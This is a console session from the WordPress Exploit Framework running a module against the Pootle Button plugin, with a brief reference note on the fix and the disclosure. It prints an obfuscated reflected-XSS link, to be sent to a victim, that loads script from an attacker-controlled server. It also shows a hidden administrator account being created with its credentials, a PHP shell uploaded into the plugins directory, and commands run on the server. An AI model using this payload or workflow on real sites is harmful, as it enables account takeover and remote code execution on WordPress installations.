wpxf > use exploit/pootle_button_reflected_xss_shell_upload
[+] Loaded module: #<Wpxf::Exploit::PootleButtonReflectedXssShellUpload:0x000000017955f8>
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set host 192.168.0.196
[+] Set host => 192.168.0.196
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set xss_host 192.168.0.2
[+] Set xss_host => 192.168.0.2
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000001435a70>
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set cmd whoami
[+] Set cmd => whoami
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set http_server_bind_address 192.168.0.2
[+] Set http_server_bind_address => 192.168.0.2
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > set http_server_bind_port 8080
[+] Set http_server_bind_port => 8080
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/pootle_button_reflected_xss_shell_upload] > run
[-] Provide the URL below to the victim to begin the payload upload
http://192.168.0.196/wp-admin/admin-ajax.php?action=pbtn_dialog&assets_url=%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C50%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C77%2C85%2C104%2C87%2C104%2C78%2C118%2C101%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E%3C
[-] Started HTTP server on 192.168.0.2:8080
[-] Incoming request received, serving JavaScript...
[+] Created a new administrator user, ogdbgk:rKSqoWxUqw
[-] HTTP server stopped
[-] Authenticating with WordPress using ogdbgk:rKSqoWxUqw...
[-] Uploading payload...
[-] Executing the payload at
http://192.168.0.196/wp-content/plugins/SweYHnzBkG/IiXkVyZeim.php...
[+] Result: www-data
[+] Execution finished successfully
wpxf [exploit/pootle_button_reflected_xss_shell_upload] >
This module exploits the "Pootle button" WordPress plugin; the plugin can be downloaded from the following URL: https://wpvulndb.com/plugins/pootle-button
Fixed in : 1.2.0
References:
WPVDBID : 8930
Disclosure : https://packetstormsecurity.com/files/144582/
example output: